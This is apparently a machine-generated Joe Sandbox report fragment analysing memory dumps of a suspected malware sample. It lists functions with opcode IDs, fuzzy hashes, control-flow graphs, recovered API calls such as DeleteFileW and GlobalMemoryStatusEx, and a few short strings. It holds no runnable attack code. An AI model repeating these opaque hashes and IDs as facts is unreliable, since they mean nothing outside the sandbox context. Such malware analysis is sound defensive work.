                                                        • Snapshot File: hcaresult_15_2_1400000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: DeleteFile
                                                        • String ID:
                                                        • API String ID: 4033686569-0
                                                        • Opcode ID: 6fe69de5314259592ca01696a177b920cf035f103680d4857953a7895bc478d2
                                                        • Instruction ID: dc1a23f8e137064e581c6d9a208bc2c505cdd2e619b061f6636ba3d01379639b
                                                        • Opcode Fuzzy Hash: 6fe69de5314259592ca01696a177b920cf035f103680d4857953a7895bc478d2
                                                        • Instruction Fuzzy Hash: 3D2147B1C0065A9FDB10CF9AD9457DEFBF4BF48320F10812AD858A7251D738A940CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1464 1408170-14081ba 1466 14081c2-14081ed DeleteFileW 1464->1466 1467 14081bc-14081bf 1464->1467 1468 14081f6-140821e 1466->1468 1469 14081ef-14081f5 1466->1469 1467->1466 1469->1468
                                                        APIs
                                                        • DeleteFileW.KERNELBASE(00000000), ref: 014081E0
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4074154183.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_1400000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: DeleteFile
                                                        • String ID:
                                                        • API String ID: 4033686569-0
                                                        • Opcode ID: 4112c2c66b3a4a9d6e7fe4245efa4258bdfcdcdfd0a0a49447e20ed478b8f1d7
                                                        • Instruction ID: 78a3b7e16e18f14e30fb8ea134249a1b64ae12d10e60e57abacc009315f1227e
                                                        • Opcode Fuzzy Hash: 4112c2c66b3a4a9d6e7fe4245efa4258bdfcdcdfd0a0a49447e20ed478b8f1d7
                                                        • Instruction Fuzzy Hash: 2D1133B1C0061A9BCB14CF9AC544B9EFBB4BF48320F10812AD858B7250D738A940CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1472 140f086-140f0fc GlobalMemoryStatusEx 1475 140f105-140f12d 1472->1475 1476 140f0fe-140f104 1472->1476 1476->1475
                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNELBASE ref: 0140F0EF
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4074154183.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_1400000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemoryStatus
                                                        • String ID:
                                                        • API String ID: 1890195054-0
                                                        • Opcode ID: f0184114be461ea936be7a4054e2955b2ef23d131e0e84305c8aeb86a7a9d464
                                                        • Instruction ID: 573937d5d1df01a9d61dbb8079f50d78de10bc17c82c722f3f5ea2a632a2a694
                                                        • Opcode Fuzzy Hash: f0184114be461ea936be7a4054e2955b2ef23d131e0e84305c8aeb86a7a9d464
                                                        • Instruction Fuzzy Hash: 461114B1C002699BCB20CF9AC444BDEFBF4AB48320F15812AE818A7251D778A944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNELBASE ref: 0140F0EF
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4074154183.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_1400000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemoryStatus
                                                        • String ID:
                                                        • API String ID: 1890195054-0
                                                        • Opcode ID: 7717100f208fec6c96744e4a493ece143d95fbf432bbe80552685fb6d87bd7bd
                                                        • Instruction ID: 4ee8d57f312ee9816bb971927fed8dec8df98d07b02ed42a97e73c9c7ba11184
                                                        • Opcode Fuzzy Hash: 7717100f208fec6c96744e4a493ece143d95fbf432bbe80552685fb6d87bd7bd
                                                        • Instruction Fuzzy Hash: 4C1123B1C002699BCB10CF9AC444BDEFBF4AF48320F15812AE818B7250D778A944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: XPcq
                                                        • API String ID: 0-714321711
                                                        • Opcode ID: 2fd4d0f1b6595e300a7cf4e8ae57807910fda0730daabfa748c8a02bfc566a92
                                                        • Instruction ID: 5b4d7afa9acc31843f2ed81dcc88ad8f32d5c773c2beffbef27d5dbf45e58175
                                                        • Opcode Fuzzy Hash: 2fd4d0f1b6595e300a7cf4e8ae57807910fda0730daabfa748c8a02bfc566a92
                                                        • Instruction Fuzzy Hash: 6241BF70B102199FDB55DFA8C854BAEBBF6FF88700F20852AE105AB395DB758C01CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q
                                                        • API String ID: 0-2549759414
                                                        • Opcode ID: d1e7607d14561a4c7796bc23a73b221b0137e7d7a93f6e64461309920c6ccaff
                                                        • Instruction ID: 6f7be7e3286d1a0d40eb31a09df42989cc4f8c535700c4cb276db298944718ba
                                                        • Opcode Fuzzy Hash: d1e7607d14561a4c7796bc23a73b221b0137e7d7a93f6e64461309920c6ccaff
                                                        • Instruction Fuzzy Hash: 2B418FB0E0070A9FDB65EF65D89469EBBB2FF86300F104969E406EB240DB74D846DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q
                                                        • API String ID: 0-2549759414
                                                        • Opcode ID: e88853a833fc1874ab4024597c6e1be52c1d2ec432a17bd92dca9a4a844af7df
                                                        • Instruction ID: 9b6bce96204bf2c9c341316950f922ac7ea5a20b4de47f928a2abbcf3c48d8f8
                                                        • Opcode Fuzzy Hash: e88853a833fc1874ab4024597c6e1be52c1d2ec432a17bd92dca9a4a844af7df
                                                        • Instruction Fuzzy Hash: 5D31E170B002058FDB59AB74D41466F7BA2FB89210F108578E406DB394DE39DD45EBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q
                                                        • API String ID: 0-388095546
                                                        • Opcode ID: c62a2dd714b322a790c6f23897cd6a3febb5cdcdf5e66102d30877b3cac09c86
                                                        • Instruction ID: 0703699d4dc955f41280a36626e8997fb328e7aeca53f70375f9a350a266aff8
                                                        • Opcode Fuzzy Hash: c62a2dd714b322a790c6f23897cd6a3febb5cdcdf5e66102d30877b3cac09c86
                                                        • Instruction Fuzzy Hash: 89F08CB1B002059FDF78AE59AA807B877A5EB40314F1450B9E905DB240CB39DD06EB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: df08479f70662362dd9662a548a1eca37a8204aa9e55a45693a38230cc8c1580
                                                        • Instruction ID: 415b8cf5d300333ce02135ba6ce3247425bc67f30afd1b3f7ab91d9a90a40f4a
                                                        • Opcode Fuzzy Hash: df08479f70662362dd9662a548a1eca37a8204aa9e55a45693a38230cc8c1580
                                                        • Instruction Fuzzy Hash: 41815C70B102099FDF54DFA9D49079EB7F6EB88304F108569E40AEB394EB34EC428B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: be9de72ed8fe4ff108a24492af1d949d0237e4a25c5d2a3cd38f6a913ecc9732
                                                        • Instruction ID: f7e268ab9b0bb85af0078ac52e127da81b28fd353957dd5f65774a4404cbf0f2
                                                        • Opcode Fuzzy Hash: be9de72ed8fe4ff108a24492af1d949d0237e4a25c5d2a3cd38f6a913ecc9732
                                                        • Instruction Fuzzy Hash: 8F61CFB1F001214FDB54AA7EC88466FAAD7EFC5624B15407AD80EDB360EEA5DD0287C2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ab022a10d241b95a68dc64003c706d68f125d76fa5c963080a028f04ee7510b2
                                                        • Instruction ID: ae4b0cb03a80b911c3c592eae46a872e1d39e39aea983d4773f500edf36f5cd9
                                                        • Opcode Fuzzy Hash: ab022a10d241b95a68dc64003c706d68f125d76fa5c963080a028f04ee7510b2
                                                        • Instruction Fuzzy Hash: 79916F70E106198FDF60DF68C880B9DB7B1FF85304F208699D549BB295DB70AA85CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bfd95a919f62940fa6f70ec120df1a3c2d2293a38c3136c343dc7d257f079e10
                                                        • Instruction ID: 8addc0b4d36cb9626388e2adfa757ae8ff543e16bed0ad77501a40345466ae72
                                                        • Opcode Fuzzy Hash: bfd95a919f62940fa6f70ec120df1a3c2d2293a38c3136c343dc7d257f079e10
                                                        • Instruction Fuzzy Hash: 5D913D70E106198BDF60DF68C880B9DB7B1FF89304F208699D549BB255DB70A985CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7e9bbdaa2045e0c7880490e918bfd6d07899a33465ef7a9624494766dd042fe8
                                                        • Instruction ID: 724ee0aa1eef01c933ee965643724c9fc5049594f93e9c6169c067fd020d1415
                                                        • Opcode Fuzzy Hash: 7e9bbdaa2045e0c7880490e918bfd6d07899a33465ef7a9624494766dd042fe8
                                                        • Instruction Fuzzy Hash: CD715C70A012199FDB54EFA9D980AADBBF6FF88300F148569E049EB355DB34EC46CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ed8dc0ba94a483a41c8f0cd4a04ae641df5f455751534d8416ea796ce1d26b91
                                                        • Instruction ID: f265e7d3a336a7758008a409cb008110f483545e39422217b457d9481954b571
                                                        • Opcode Fuzzy Hash: ed8dc0ba94a483a41c8f0cd4a04ae641df5f455751534d8416ea796ce1d26b91
                                                        • Instruction Fuzzy Hash: 81713C70A012199FDB54EFA9D980AADBBF6FF84300F148569E405EB354DB74EC46CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: baca06400bb595bd3c889e13b55f64f35b125c306fb632a6fdf071698e82e3f7
                                                        • Instruction ID: c09f47051be8822609705c3707d861a0be95d21852291bcb5af58a871cf8c133
                                                        • Opcode Fuzzy Hash: baca06400bb595bd3c889e13b55f64f35b125c306fb632a6fdf071698e82e3f7
                                                        • Opcode Fuzzy Hash: e5e873b6849b77e860e229451da798610f1b07524bd61f8aa728c8fb854e0831
                                                        • Instruction Fuzzy Hash: 8B018CB1B101211BDB64AA2ED894B3EB7DBEBC9610F14987AE60AC7340DA25DC024385
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 66a0ff5400141065ce7329a389dea63fc7451f6e97432352a12db4708e2507a1
                                                        • Instruction ID: ac61488e8af75d9c47ae602ea8d1d3c1d57eb9044f364b7fd630cbd0d32776ef
                                                        • Opcode Fuzzy Hash: 66a0ff5400141065ce7329a389dea63fc7451f6e97432352a12db4708e2507a1
                                                        • Instruction Fuzzy Hash: DA01A470B401141FDB74EA7DE554B2EB7EAE789710F109479E10ED7744EE25EC028785
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5ef338648a435af1cb9c769aca2dd8c075d999c770f993f7fdd6c8b6ed0a3059
                                                        • Instruction ID: 801eadf63e56ffacd72c71ad2023dbc0ed4bf1ac69f6060054d108f80f6c7b0b
                                                        • Opcode Fuzzy Hash: 5ef338648a435af1cb9c769aca2dd8c075d999c770f993f7fdd6c8b6ed0a3059
                                                        • Instruction Fuzzy Hash: 62E022B0A082486FCF60EEB48C5064B7FA9CB03258F1080E2D444CB243E536C9029BE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%